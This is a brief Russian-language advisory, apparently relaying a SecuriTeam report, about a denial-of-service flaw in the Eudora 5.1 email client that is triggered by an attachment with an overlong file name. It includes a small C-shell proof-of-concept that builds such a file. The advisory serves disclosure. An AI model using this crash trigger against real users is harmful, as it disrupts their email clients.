Уязвимость отказа в обслуживании обнаружена в почтовом клиенте Eudora. Удаленный пользователь может послать почтовое сообщение, которое приведет к аварийному завершению работы клиента.
SecuriTeam сообщил, что удаленный пользователь может послать e-mail сообщение с файлом, который имеет длинное имя, целевому пользователю, чтобы аварийно завершить работу программы. Пример:
Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)
Уязвимость обнаружена в Eudora Versions 5.1.*.
